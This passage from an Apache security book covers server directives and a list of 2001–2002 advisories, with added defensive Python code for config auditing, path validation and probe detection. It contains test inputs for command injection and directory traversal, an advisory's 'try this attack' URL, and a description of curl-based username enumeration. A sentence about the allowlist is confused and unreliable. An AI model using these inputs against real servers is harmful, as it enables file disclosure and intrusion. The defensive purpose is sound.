The ServerPath directive, included as a core feature, sets the URL path name for a 
name-based virtual host. This supports legacy clients that don’t properly handle 
name-based virtual hosts. 


Syntax is: 


ServerPath path 


path is any directory path you specify. 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


ServerRoot 


The ServerRoot directive, included as a core Apache feature, lets you specify where 
the root Apache directory resides. This directory stores Apache’s configuration files. 
In default installations (for example, in 1.3), this was historically /etc/httpd. When 
you assign this directory, take care. It should be a secured directory, and one that 
carries sufficiently stringent permissions. 


Syntax is: 

ServerRoot path 

path is the directory path you specify. Currently (in 2.0), the default is 
/usr/local/apache. 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 
ServerSignature


The ServerSignature directive, included as an Apache core feature, enables you to 
specify a trailing footer that identifies your server or reflects your server's identity. 
ServerSignature supports three arguments: 


• Off—The default; this issues no trailing footer.

• On—Enabled; this issues Apache version and the ServerName value (your server’s name).

• Email—Here, you specify an administrative e-mail address.


Syntax is: 


ServerSignature state email-option 


Since Off is the default, you have two choices: 
1. ServerSignature On—An identifying trailing footer only 


2. ServerSignature On Email—An identifying trailing footer, plus your administrative e-mail address


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


User 


The User directive sets Apache’s user ID (UID), or the user under which Apache will 
answer client requests. Never set this to root. Typically, in default installations this 
value is user nobody. 


Syntax is: 

User userid 

userid is whatever user you specify. For example, to set this value to nobody, you’d 
configure User like this 


User nobody 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


UserDir 


The UserDir directive, included in mod_userdir, sets the directory from which 
Apache pulls user-owned documents. UserDir thus enables you to specify where 
users must store their documents to make them visible to remote clients. 
Traditionally, the directory was public_html (and in versions earlier than 1.1, this was your only option). That is, to make their documents remotely accessible, users had to create a directory within their home directory named public_html:

/home/samshacker/public_html

This would make user samshacker’s documents available at the URL http://www.foo.com/~samshacker/, even though internally, these documents resided in /home/samshacker/public_html.


Today, UserDir lets you establish this user-specific directory anywhere—and therein 
lies trouble. Choose this directory with caution, ensuring that it carries sufficiently 
stringent permissions. 


Syntax is: 


UserDir directory 


directory is whatever directory you specify. 


UserDir also supports the keywords enabled and disabled. You use these to specify a 
particular user or list of users for which requests can or cannot work. For example, 
Apache documentation has long recommended this option, to prevent remote 
clients from pulling documents in any root-owned directory: 


UserDir disabled root 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 
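The directive entries above (User, ServerSignature, UserDir, ProxyRequests, PassEnv) each carry a security caveat that is easy to lose in a long httpd.conf. The following is an added example, not code from the book or from the Apache project: a small Python audit that parses a constructed httpd.conf and reports the settings those entries warn about. The sample configurations, the list of checks and the choice of which PassEnv variables count as risky are assumptions made for illustration.

```python
"""Audit a (constructed) httpd.conf against the directive guidance above.

Added example, not from the book or the Apache project. The sample
configurations and the list of checks are assumptions made for illustration.
"""
import re

# Constructed sample that violates several of the points made above.
SAMPLE_CONF = """\
ServerRoot "/usr/local/apache"
# Apache must not answer requests as root.
User root
Group nobody
ServerSignature On Email
ServerAdmin webmaster@example.com
UserDir public_html
ProxyRequests On
PassEnv LD_LIBRARY_PATH PATH HOME
"""

# Constructed sample with the same directives set conservatively.
HARDENED_CONF = """\
ServerRoot "/usr/local/apache"
User nobody
Group nobody
ServerSignature Off
ServerAdmin webmaster@example.com
UserDir public_html
UserDir disabled root
ProxyRequests Off
PassEnv HOME
"""

# Shell variables that change which libraries or binaries a CGI program picks up
# (assumed list; extend it for your site).
LOADER_VARS = {"ld_library_path", "path", "ifs"}


def parse_directives(text):
    """Return [(name, [args])] for each directive line; comments, blank lines and
    container tags (<Directory> and the like) are skipped. Directive names are
    case-insensitive in httpd.conf, so they are lowercased here."""
    directives = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#<":
            continue
        parts = [p.strip('"') for p in re.findall(r'"[^"]*"|\S+', line)]
        directives.append((parts[0].lower(), parts[1:]))
    return directives


def audit(text):
    """Return the list of findings for a configuration, in file order."""
    findings = []
    userdir_seen = False
    root_disabled = False
    for name, args in parse_directives(text):
        lowered = [a.lower() for a in args]
        if name == "user" and lowered == ["root"]:
            findings.append("User root: httpd must never answer requests as root")
        elif name == "serversignature" and lowered[:1] == ["on"]:
            findings.append("ServerSignature On: footer discloses the Apache version and ServerName")
        elif name == "proxyrequests" and lowered == ["on"]:
            findings.append("ProxyRequests On: Apache acts as a proxy; confirm ProxyBlock and access rules")
        elif name == "passenv":
            risky = sorted(LOADER_VARS & set(lowered))
            if risky:
                findings.append("PassEnv passes loader/path variables to CGI: " + ", ".join(risky))
        elif name == "userdir":
            # "UserDir disabled" alone disables every user; "disabled root ..." names users.
            if lowered[:1] == ["disabled"] and (len(lowered) == 1 or "root" in lowered[1:]):
                root_disabled = True
            else:
                userdir_seen = True
    if userdir_seen and not root_disabled:
        findings.append("UserDir enabled without 'UserDir disabled root'")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONF):
        print("-", finding)
    print("hardened sample findings:", audit(HARDENED_CONF))
```

Run it against your own httpd.conf by reading the file into `audit()`; the parser ignores container blocks, so directives nested in `<Directory>` or `<VirtualHost>` sections need a scope-aware parser before the same checks apply to them.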


Appendix B
Apache Security Advisories and Bugs


This appendix summarizes recent Apache security and 
administrative issues. 


Apache Security Issues 


This section lists serious security issues from April 2001 to January 2002.


Win32 PHP.EXE Remote File Disclosure 


Date: January 4, 2002
Source: Paul Brereton
Versions: Apache 1.3.11win32, 1.3.11, 1.3.12win32, 1.3.12, 1.3.13win32, 1.3.14win32, 1.3.14, 1.3.15win32, 1.3.16win32, 1.3.17win32, 1.3.17, 1.3.18win32, 1.3.18, 1.3.19win32, 1.3.19, 1.3.20win32, 1.3.20, and 1.3.22, plus W2K, Win98
Description: Win32’s PHP.EXE allows remote attackers to view arbitrary files and, in some cases, launch executables.
Fix: Unknown
References: http://www.securiteam.com/windowsntfocus/5ZP030U60U.html
zml.cgi File Disclosure

Date: December 31, 2001
Source: blackshell@hushmail.com
Versions: Abe Timmerman’s zml.cgi
Description: zml.cgi is a Perl-based CGI script that handles Server-Side Includes (SSI). Find it at http://www.jero.cc/zml/test.zml. The script takes a file name argument but fails to stringently filter that argument. Hence, attackers can send a strand of ../ directives, and the script processes these and returns whatever files attackers request.
Fix: Unknown (though you could filter ../ submissions)
References: http://www.securityfocus.com/archive/1/247742


Last Lines Directory Traversal Vulnerability 


Date: December 30, 2001
Source: BrainRawt
Versions: Matrix’s CGI Vault “Last Lines” 2.0 and Apache 1.3.17, 1.3.18, 1.3.19, 1.3.20, and 1.3.22
Description: Last Lines CGI is a free, Perl-based CGI tool from Matrix’s Vault. It prints x number of lines from a specified log file to a specified Web page. The script doesn’t filter metacharacters properly and therefore allows remote users to examine any Web-readable directory.
Fix: None yet, but you can hack a metacharacter filter like this: s/[^a-zA-Z0-9\-=_]//g;. This removes every character that is not a letter, digit, hyphen, equals sign, or underscore.
References: http://www.securityfocus.com/archive/1/247710


Last Lines Remote Command Vulnerability 


Date: December 30, 2001
Source: BrainRawt
Versions: Matrix’s CGI Vault “Last Lines” 2.0 and Apache 1.3.17, 1.3.18, 1.3.19, 1.3.20, and 1.3.22
Description: Last Lines CGI is a free, Perl-based CGI tool from Matrix’s Vault. It prints x number of lines from a specified log file to a specified Web page. The script doesn’t filter metacharacters properly and therefore allows remote users to execute arbitrary commands sent through a Web browser.
Fix: None yet, but you can hack a metacharacter filter like this: s/[^a-zA-Z0-9\-=_]//g;. This removes every character that is not a letter, digit, hyphen, equals sign, or underscore.
References: http://www.securityfocus.com/archive/1/247710


Oracle 9i PL/SQL Apache Module Buffer Overflow 


Date: December 20, 2001
Source: David Litchfield
Versions: Oracle 9iAS
Description: Oracle 9iAS ships with a PL/SQL Apache module that provides Database Access Descriptors (DAD) management facilities.
Fix: Oracle Patch 2128936; http://metalink.oracle.com/
References: http://otn.oracle.com/deploy/security/pdf/modplsql.pdf


JRun Malformed URL Vulnerability 


Date: November 27, 2001
Source: George Hedfors
Versions: Allaire JRun 3.0 and 3.1
Description: JRun is a Java application server that deploys JSP, Java Servlets, EJB, JTA, and JMS. Attackers can subvert JRun’s security by issuing a malformed URL. Results vary, but reports indicate that attackers can obtain access to protected files, including ASP source files. This is not an Apache issue. Researchers thought this was restricted to exclusively IIS-based sites. However, some researchers suggest that Apache systems running JRun could be vulnerable. Try this attack on your own system. The URL to send is http://www.targethost.net/%3f.jsp.
Fix: http://www.macromedia.com/v1/handlers/index.cfm?ID=22262&Method=Full
References: Allaire/Macromedia advisory MPSB01-13: http://www.cgisecurity.com/archive/misc/Jrun_dir_browsing_hole.txt


Apache Directory Index Exposure 


Date: November 27, 2001
Apache Report No: N/A
Source: Kevin (and the Mandrake Security Team)
Versions: Apache 1.3.11, 1.3.14, EnGarde Secure Linux 1.0.1, Mandrake 7.1, Mandrake 7.2, MandrakeSoft Single Network Firewall 7.2, Apache 1.3.17, MandrakeSoft Corporate Server 1.0.1, Mandrake 8.0, Mandrake 8.0 ppc, OpenBSD 2.8, SuSE 7.1, Apache 1.3.18, Apache 1.3.19; Mac OS X 10.0.3, Caldera eDesktop 2.4, Caldera eServer 2.3.1, OpenLinux 2.4, Debian 2.3, TRU64UNIX 4.0f, TRU64UNIX 4.0g, TRU64UNIX 5.0, FreeBSD 3.5.1, FreeBSD 4.2, HP-UX 10.20, HP-UX 11.0, HP-UX 11.11, Mandrake 7.1, Mandrake 7.2, Mandrake 8.0, Mandrake 8.1, NetBSD 1.5, NetBSD 1.5.1, OpenBSD 2.8, OpenBSD 2.9, Red Hat 6.2, Red Hat 7.0, Red Hat 7.1, SuSE 6.4, SuSE 7.0, SuSE 7.1, SGI IRIX 6.5.8, SGI IRIX 6.5.9, Solaris 7.0, Solaris 8.0, 1.3.20, and Red Hat Secure Web Server 3.2 i386
Description: Under certain circumstances, due to a flaw in Apache’s content negotiation, attackers can obtain directory indexes—even when you insert a default index file (index.html, index.htm, index.php, home.htm, and so on) in the specified directory.
Fix: Upgrade
References: See the message with the subject “How Google indexed a file with no external link” at http://www.securityfocus.com/archive/1/195833


Malicious Webmaster File Extension Spoofing 


Date: November 26, 2001
Apache Report No: N/A
Source: Jouko Pynnonen
Versions: All versions
Description: Occasionally, the issue is more what Web sites can do to visitors than what visitors can do to Web sites. This is one such case. It affects MSIE 5.5 and 6.0. Webmasters can force IE to download executable files named with any extension (for example, *.txt), thus fooling Windows into opening programs that remote users wouldn’t otherwise wittingly open. Through this mechanism, Apache administrators can run malicious code on visitors’ machines. To see the exploit (which offers endless possibilities) in action, check SecurityFocus at http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=exploit&id=3597.
Fix: See the reference URL; Microsoft issued a patch.
References: http://www.microsoft.com/technet/security/bulletin/MS01-058.asp?frame=true


Stronghold File System Disclosure 


Date: November 23, 2001
Apache Report No: N/A
Source: Madalina Andrei, Reda Zitouni
Versions: Apache/1.3.19, mod_perl/1.25, mod_ssl/2.8.1, OpenSSL/0.9.6, PHP/3.0.18, Stronghold 2.3, 2.4, 3.0
Description: Stronghold is a secure Apache implementation from Red Hat. (Learn more about Stronghold at http://www.redhat.com/software/Apache/stronghold/.) The default installation creates two URLs at which administrators can view server status (/stronghold-info and /stronghold-status). Outsiders can see these URLs.
Fix: Disallow access from any domain but yours.
References: http://www.securityfocus.com/archive/1/241952


mod_user_track Predictable ID Generation Flaw 


Date: November 7, 2001
Apache Report No: N/A
Source: David Endler
Versions: Apache 1.3.11, 1.3.12, 1.3.14, 1.3.17, 1.3.18, 1.3.19, 1.3.20
Description: mod_user_track is a module that provides tracking of user preferences and behavior through cookies. Session IDs that mod_user_track generates consist of a client’s IP, the system time, and the server PID. As such, they aren’t random, anyone can generate them, and anyone can use them to impersonate other users. Therefore, don’t build applications that rely on them. To learn more about mod_user_track, see Appendix A, “Apache Security-Related Modules and Directives,” or see Chapter 11, “Apache and Authentication: Who Goes There?”
Fix: Unknown, but not required. Do not build applications that rely on these values for authentication.
References: Brute-Forcing Web Session IDs by David Endler (PDF), which you’ll find at http://www.idefense.com/papers.html
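Both the mod_unique_id entry in Appendix A (a 19-character value built from a 32-bit IP address, a 32-bit pid, a 32-bit time stamp and a 16-bit counter) and the mod_user_track entry above (IP, system time and PID) describe identifiers whose every field is recoverable by anyone who holds one. The following added example, which is not code from the book or from Apache, packs those four fields the way the appendix describes and then decodes them back, to make the point concrete: a value that can be decoded is a label, not a secret. The encoding alphabet and bit layout are assumptions for illustration and are not claimed to be bit-compatible with Apache's own encoder; the last function shows what an application should use for a session token instead.

```python
"""Why request IDs built from IP, PID, time and a counter are not secrets.

Added example, not code from the book or from Apache. It mirrors the field
layout the appendix describes for mod_unique_id but uses its own alphabet
and bit order (assumptions), so it is an illustration, not a decoder for
real $UNIQUE_ID values.
"""
import secrets
import socket
import struct

# 64-symbol alphabet, six bits per symbol (an assumption; Apache has its own table).
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@-"
FIELD_BYTES = 14  # 4 (IP) + 4 (pid) + 4 (time stamp) + 2 (counter) = 112 bits
ID_LENGTH = 19    # 19 * 6 = 114 bits; the low two bits are padding


def pack_fields(ip, pid, stamp, counter):
    """Pack the four fields into 14 big-endian bytes."""
    return socket.inet_aton(ip) + struct.pack(">IIH", pid, stamp, counter)


def encode_id(ip, pid, stamp, counter):
    """Encode the packed fields as 19 six-bit symbols."""
    bits = int.from_bytes(pack_fields(ip, pid, stamp, counter), "big") << 2
    return "".join(ALPHABET[(bits >> (6 * i)) & 0x3F] for i in reversed(range(ID_LENGTH)))


def decode_id(uid):
    """Recover (ip, pid, stamp, counter): every field is in the clear."""
    bits = 0
    for ch in uid:
        bits = (bits << 6) | ALPHABET.index(ch)
    raw = (bits >> 2).to_bytes(FIELD_BYTES, "big")
    pid, stamp, counter = struct.unpack(">IIH", raw[4:])
    return socket.inet_ntoa(raw[:4]), pid, stamp, counter


def minted_together(id_a, id_b):
    """True when two IDs share IP, pid and time stamp and differ only in the
    counter, i.e. the same httpd process issued both within one second."""
    a, b = decode_id(id_a), decode_id(id_b)
    return a[:3] == b[:3] and a[3] != b[3]


def session_token():
    """What an application should rely on instead: 32 bytes from the OS CSPRNG."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    # Constructed values: a documentation-range address, an arbitrary pid,
    # a 2002-era time stamp and a small counter.
    first = encode_id("192.0.2.10", 4242, 1009843200, 7)
    second = encode_id("192.0.2.10", 4242, 1009843200, 8)
    print(first, "->", decode_id(first))
    print("same process, same second:", minted_together(first, second))
    print("random token instead:", session_token())
```

The contrast is the point: `decode_id` needs no key, while `session_token` draws from the operating system's random source and carries no structure to recover.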


MultiViews Query String Vulnerability 


Date: October 29, 2001
Apache Report No: 8628
Source: Iain Truskett
Versions: 1.3.22 and perhaps earlier
Description: When affected versions negotiate a URI via MultiViews, they discard CGI query strings. In some cases, attackers can force a directory listing by sending a query string of M=D.
Fix: Unknown
References: http://bugs.Apache.org/index.cgi/full/8628


NAI PGP Keyserver Administrative Interface DoS 


Date: September 28, 2001
Apache Report No: N/A
Source: Nobuo Miwa
Versions: PGP Keyserver 7.0 and 7.0.1
Description: You might not use NAI PGP Keyserver, but many Webmasters do. If you do, take note: Affected versions allow an attacker to deny legitimate users service by sending custom-crafted URLs. Moreover, in some instances, remote attackers can turn the service on and off. This is a permission problem, not an internal software flaw.
Fix: Change network permissions to disallow remote users access to the service.
References: http://www.pgp.com/support/product-advisories/keyserver.asp


H-Sphere File Disclosure 


Date: September 25, 2001
Apache Report No: N/A
Source: Crazy Einstein
Versions: H-Sphere 1.5 + Apache 1.3.9, IIS 5.0; H-Sphere 2.06 + Apache 1.3.9, IIS 5.0; H-Sphere 2.05 + Apache 1.3.9, IIS 5.0; H-Sphere 2.0 + Apache 1.3.9, IIS 5.0
Description: H-Sphere is a front end for automating Web hosting operations, including billing, e-mail, Web, FTP, DNS, POP3, cgi-bin, WebMail, and FrontPage configuration. Apparently, it doesn’t filter ../ sequences, leading to file disclosure when attackers enter the correct combination. (In other words, anyone with a Web client can exploit this weakness.)
Fix: Unknown. The engine at http://www.psoft.net/ contains no info on it, nor does the Positive Software forum or archive—not that I can find, anyway. Presumably, though, an upgrade would solve the problem. Positive Software must be aware of this issue, so I assume that its development team is addressing it now.
References: http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=3359


Log File Vulnerability 


Date: September 22, 2001
Apache Report No: 7848
Source: Daniel Matuschek
Versions: 1.3.20 and earlier
Description: Attackers can connect to a virtual host on an Apache system that uses split-logfile and, using a specially crafted URL that precedes the target address with a slash, overwrite or append to log files. In so doing, attackers can erase bona fide log evidence or fabricate false evidence.
Fix: Upgrade to 1.3.22.
References: Conectiva Linux security advisory at http://www.linuxsecurity.com/advisories/other_advisory-1645.html or the Apache Bug Database at http://bugs.Apache.org/index.cgi/full/7848
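Three entries in this appendix describe the same class of mistake: a script builds a file name from a request field it never checked (the zml.cgi file argument, the Last Lines log-file argument handed to a shell, and the virtual-host name split-logfile turns into a log path). The added example below, which is not code from the book or from any of those scripts, shows the three checks a rewrite would need: an allowlist for an argument that must stay simple (the character set the Last Lines fix above uses), a confinement check that resolves a requested name under a base directory and refuses anything that escapes it, and a hostname check for a log-splitter's per-host field. The base directories and sample inputs are constructed for illustration.

```python
"""Validate request-supplied names before they reach the file system or a shell.

Added example, not code from the book, zml.cgi, Last Lines or split-logfile.
Paths such as /srv/www/zml are constructed for illustration.
"""
import os
import re

# Characters the Last Lines fix permits: letters, digits, hyphen, equals, underscore.
SAFE_ARG = re.compile(r"^[A-Za-z0-9=_-]+$")

# Hostname labels only, so a vhost field can never carry '/', '..' or a space.
HOSTNAME = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def safe_arg(value):
    """Return value unchanged if it matches the allowlist, else None.

    Refusing beats stripping: a value with the offending characters removed
    may still name a file the script's author never meant to expose."""
    return value if SAFE_ARG.match(value) else None


def confined_path(base, name):
    """Resolve name beneath base and return the absolute path, or None when the
    result lies outside base. realpath() normalises '..' segments and follows
    symlinks, and os.path.join() lets an absolute name replace base, which is
    exactly why the result must be compared with the base afterwards."""
    base_abs = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_abs, name))
    if target == base_abs or target.startswith(base_abs + os.sep):
        return target
    return None


def log_path_for_vhost(logdir, vhost):
    """split-logfile style: derive the per-host log path only from a
    syntactically valid hostname, then confine it to logdir as well."""
    if len(vhost) > 253 or not HOSTNAME.match(vhost):
        return None
    return confined_path(logdir, vhost + ".log")


if __name__ == "__main__":
    # Constructed request values, benign and hostile.
    for arg in ("access_log", "x; cat /etc/passwd", "../../etc/passwd"):
        print(repr(arg), "->", safe_arg(arg))
    for name in ("docs/index.zml", "../../etc/passwd", "/etc/passwd"):
        print(repr(name), "->", confined_path("/srv/www/zml", name))
    for host in ("www.example.com", "/etc/passwd", "../access"):
        print(repr(host), "->", log_path_for_vhost("/srv/log/httpd", host))
```

`confined_path` is the check that matters for file disclosure; the allowlist alone does not stop `../` because dots are not in the set it rejects only when you write it that way, and a shell is best avoided entirely by reading the file from Python rather than invoking tail.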


Oracle 9i Path Disclosure 


Date: September 17, 2001
Apache Report No: N/A
Source: KK Mookhey
Versions: Oracle 9i Application Server, Compaq Tru64 4.0g, 5.0, 5.0a, 5.0f, 5.1; 7.0, 7.2, 7.4, 7.6, 7.8, 8.0, 8.1, 8.2, 8.4, 8.5, 8.6, 8.7, 8.8, 8.9, 9.0, 9.1, 9.3, 9.4, 9.5, 9.6, 9.7, 9.8, 9.9, 10, 10.0, 10.01, 10.1, 10.8, 10.9, 10.10, 10.16, 10.20, 10.26, 10.30, 10.34, 11.0, 11.04, and 11.11; AIX 1.2.1, 1.3, 2.2.1, 3.0x, 3.1, 3.2, 3.2.4, 3.2.5, 4.0, 4.1, 4.1.1, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.2, 4.2.1, 4.3, 4.3.1, 4.3.2, 4.3.3, and 5.1; 2000, 2000 SP1, 2000 SP2, NT 4.0, NT 4.0SP1, NT 4.0SP2, NT 4.0SP3, NT 4.0SP4, NT 4.0SP5, and NT 4.0SP6a; Solaris 1.1, 1.1.1, 1.1.2, 1.1.3, 1.1.3_U1, 1.1.4, 1.1.4-JL, 1.2, 2.0, 2.1, 2.2, 2.3, 2.4, 2.4_x86, 2.5, 2.5_x86, 2.5.1, 2.5.1_x86, 2.6, 2.6_x86, 2.6_x86HW3/98, 2.6_x86HW5/98, 2.6HW3/98, 2.6HW5/98, 7.0, 7.0_x86, 8.0, and 8.0_x86
Description: Oracle 9i Application Server ships with Apache and a Java engine for JSP/servlets. Learn more about Oracle Application Server at http://www.oracle.com/ip/ (right below the sentence that in strong and bold solemnly declares Only Oracle9i Is Unbreakable). When attackers send a request for a JSP file that doesn’t exist, Oracle9i reveals internal Web paths. It throws a javax.servlet.ServletException message and reports http://[path]/[file.jsp] (The system cannot find the file specified). Doh!
Fix: Upgrade to OJSP 1.1.2.0.0. Get it at http://otn.oracle.com/software/tech/java/servlets/content.html.
References: http://www.securityfocus.com/archive/1/214577


Red Hat Apache Remote Username Exposure 


Date: September 12, 2001
Apache Report No: N/A
Source: Alexander A. Kelner
Versions: Red Hat Linux 7.0
Description: This doesn’t lead to system compromise. Instead, it exposes your system to intelligence gathering. It works like this: Attackers can use Web clients to ascertain valid usernames by trying http://www.foo.com/~username. Apache will throw different status codes—200, 403, or 404—depending on what it finds. For example, if a user exists and has a home page, Apache returns the home page. However, if a user exists but has no home page, Apache reports an access permission error. Finally, if no such user exists, Apache reports that it cannot find the specified index. Through this mechanism, attackers can differentiate valid usernames from invalid ones. They needn’t do it one at a time, either, or even three at a time. URL-grabbing tools such as curl (available at http://curl.haxx.se/) enable attackers to automate such discovery. Indeed, curl is powerful and, when driven by a shell script, can check for usernames against a 250,000-word dictionary. Everything is clean, automated, and effective. Moreover, because curl needs only return status headers, attackers can do this at high speed with low overhead.
Fix: Disable UserDir or hard-code an HTML source file for Apache to return in such instances.
References: http://www.securityfocus.com/archive/1/213667

Mac OS X Apache Directory Disclosure

Date: September 10, 2001
Apache Report No: N/A
Source: Jacques Distler
Versions: Apache 1.3.14Mac, Mac OS X 10.0, 10.0.1, 10.0.2, and 10.0.3
Description: This hole is extremely limited in its scope. When attackers use the Mac OS X client and request a URL from affected systems, Apache reveals a directory’s contents if the request includes a specification of a .DS_Store file.
Fix: No official patch. Distler advises using the <FilesMatch> directive to shut out access. <FilesMatch> enables you to specify what Apache does when a client requests the specified file type. For this, <FilesMatch> uses basic regular expression pattern matching. For example, to disallow access to gif or jpeg files, use <FilesMatch "\.(gif|jpe?g)$">.
References: See the message dated 8 Aug 2001 with the subject “More security problems in Apache on Mac OS X” at http://www.macintouch.com/mosxreaderreports46.html.
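The Red Hat Apache Remote Username Exposure entry above describes a probe that leaves a distinctive trace in the access log: one client requesting many different /~username/ paths and collecting mostly 403 and 404 answers. The following is an added example, not code from the book: a Python detector that parses Common Log Format lines and flags clients by the number of distinct usernames they tried and the share of those requests that failed. The log lines are constructed, and the thresholds are assumptions to tune per site; a real visitor browses one or two home pages, an enumerator walks a word list.

```python
"""Flag UserDir username probing in an Apache access log.

Added example, not code from the book. Sample log lines are constructed in the
Common Log Format; thresholds are assumptions to be tuned per site.
"""
import re
from collections import defaultdict

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# A bare home-page request: /~name or /~name/ with nothing after it.
USERDIR = re.compile(r"^/~(?P<user>[^/?]+)/?$")

# Constructed sample: one client walks a list of names with HEAD requests,
# another reads one user's pages normally.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Sep/2001:10:00:01 -0400] "HEAD /~alice/ HTTP/1.0" 200 0
198.51.100.7 - - [12/Sep/2001:10:00:01 -0400] "HEAD /~bob/ HTTP/1.0" 403 0
198.51.100.7 - - [12/Sep/2001:10:00:01 -0400] "HEAD /~carol/ HTTP/1.0" 404 0
198.51.100.7 - - [12/Sep/2001:10:00:02 -0400] "HEAD /~dave/ HTTP/1.0" 404 0
198.51.100.7 - - [12/Sep/2001:10:00:02 -0400] "HEAD /~erin/ HTTP/1.0" 404 0
198.51.100.7 - - [12/Sep/2001:10:00:02 -0400] "HEAD /~frank/ HTTP/1.0" 403 0
203.0.113.9 - - [12/Sep/2001:10:05:00 -0400] "GET /~alice/ HTTP/1.0" 200 2048
203.0.113.9 - - [12/Sep/2001:10:05:01 -0400] "GET /~alice/cv.html HTTP/1.0" 200 5120
"""


def parse(lines):
    """Yield a dict per well-formed log line; malformed lines are skipped."""
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            yield m.groupdict()


def userdir_probes(lines, min_distinct=5, min_miss_ratio=0.5):
    """Return {ip: (distinct_users, misses, requests)} for clients that asked
    for at least min_distinct different ~user home pages and got a 403 or 404
    for at least min_miss_ratio of those requests."""
    users = defaultdict(set)
    misses = defaultdict(int)
    requests = defaultdict(int)
    for rec in parse(lines):
        m = USERDIR.match(rec["path"])
        if not m:
            continue
        ip = rec["ip"]
        users[ip].add(m.group("user"))
        requests[ip] += 1
        if rec["status"] in ("403", "404"):
            misses[ip] += 1
    flagged = {}
    for ip, seen in users.items():
        if len(seen) >= min_distinct and misses[ip] / requests[ip] >= min_miss_ratio:
            flagged[ip] = (len(seen), misses[ip], requests[ip])
    return flagged


if __name__ == "__main__":
    for ip, (distinct, missed, total) in userdir_probes(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {distinct} usernames tried, {missed}/{total} answered 403/404")
```

The detector keys on distinct usernames rather than raw request volume, so a popular home page does not trip it; lowering `min_distinct` catches slower probes at the cost of more review work.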
mod_auth_oracle SQL Vulnerability

Date: September 5, 2001
Apache Report No: N/A
Source: Florian Weimer of RUS-CERT (University of Stuttgart)
Versions: mod_auth_oracle 0.5.1 and Apache 0.8.14, 1.0, 1.0.2, 1.0.3, 1.0.5, 1.1, 1.1.1, 1.2, 1.2.5, 1.3, 1.3.1, 1.3.3, 1.3.4, 1.3.9, 1.3.11, 1.3.12, 1.3.14, 1.3.17, 1.3.18, 1.3.19, and 1.3.20; Oracle7 7.3.3, Oracle7 7.3.4, Oracle8 8.0.3, Oracle8 8.0.4, Oracle8 8.0.5, Oracle8 8.0.5.1, Oracle8 8.0.6, Oracle8 8.1.6, Oracle8 8.1.7, Oracle8i 8.0.5, Oracle8i 8.0.6, Oracle8i 8.1.5, Oracle8i 8.1.6, Oracle8i 8.1.7, Oracle9i 9.0, and Oracle9i 9.0.1
Description: mod_auth_oracle is an authentication module originally designed by Serg Oskin for Oracle7 or Oracle8/8i clients. It gained more widespread use in Apache 1.3 to Oracle8/8i and offers database-based authentication using Oracle. Affected versions allow remote attackers to send SQL commands and, in limited circumstances, alter tables.
Fix: Get 0.5.4 at http://www.macomnet.ru/~oskin/mod_auth_oracle.html.
References: http://cert.uni-stuttgart.de/advisories/Apache_auth.php


PHPMyExplorer File Disclosure 


Date: August 29, 2001
Apache Report No: N/A
Source: Ben Ford
Versions: PHPMyExplorer Classic 1.0, Classic 1.1.0, Classic 1.1.1, Classic 1.1.3, Classic 1.1.4, Classic 1.1.5, Classic 1.2, and MultiUser 1.0
Description: PHPMyExplorer is a front end that lets you manage sites through a browser. Affected versions have a critical flaw: They allow attackers to break out of DocumentRoot and browse the greater file system at will. This is a disastrous hole that can lead to root compromise.
Fix: Update to 1.2.1.
References: http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=3266
mod_auth_pgsql SQL Vulnerability

Date: August 29, 2001
Apache Report No: N/A
Source: Florian Weimer of RUS-CERT (University of Stuttgart)
Versions: mod_auth_pgsql 0.9.5 plus Apache 0.8.11, 0.8.14, 1.0, 1.0.2, 1.0.3, 1.0.5, 1.1, 1.1.1, 1.2, 1.2.5, 1.3, 1.3.1, 1.3.3, 1.3.4, 1.3.9, 1.3.11, 1.3.12, 1.3.14, 1.3.17, 1.3.18, 1.3.19, and 1.3.20; PostgreSQL 6.3.2 and 6.5.3; also mod_auth_pgsql 0.9.6 plus Apache 0.8.11, 0.8.14, 1.0.2, 1.0.3, 1.0.5, 1.1, 1.1.1, 1.2, 1.2.5, 1.3, 1.3.1, 1.3.3, 1.3.4, 1.3.9, 1.3.11, 1.3.12, 1.3.14, 1.3.17, 1.3.18, 1.3.19, 1.3.20; and PostgreSQL 6.3.2/6.5.3
Description: Giuseppe Tanzilli’s mod_auth_pgsql is an Apache authentication module for 1.3 to PostgreSQL. (Learn more at http://www.giuseppetanzilli.it/mod_auth_pgsql.) mod_auth_pgsql provides database authentication via PostGRES. Affected versions allow remote attackers to send SQL commands and, in limited circumstances, alter tables.
Fix: Upgrade to 0.9.9.
References: http://cert.uni-stuttgart.de/advisories/Apache_auth.php


mod_auth_pgsql_sys SQL Vulnerability 


Date: August 29, 2001
Apache Report No: N/A
Source: Florian Weimer of RUS-CERT (University of Stuttgart)
Versions: mod_auth_pgsql_sys 0.9.4 plus Apache 0.8.11, 0.8.14, 1.0, 1.0.2, 1.0.3, 1.0.5, 1.1, 1.1.1, 1.2, 1.2.5, 1.3, 1.3.1, 1.3.3, 1.3.4, 1.3.9, 1.3.11, 1.3.12, 1.3.14, 1.3.17, 1.3.18, 1.3.19, 1.3.20, and PostgreSQL 6.3.2/6.5.3
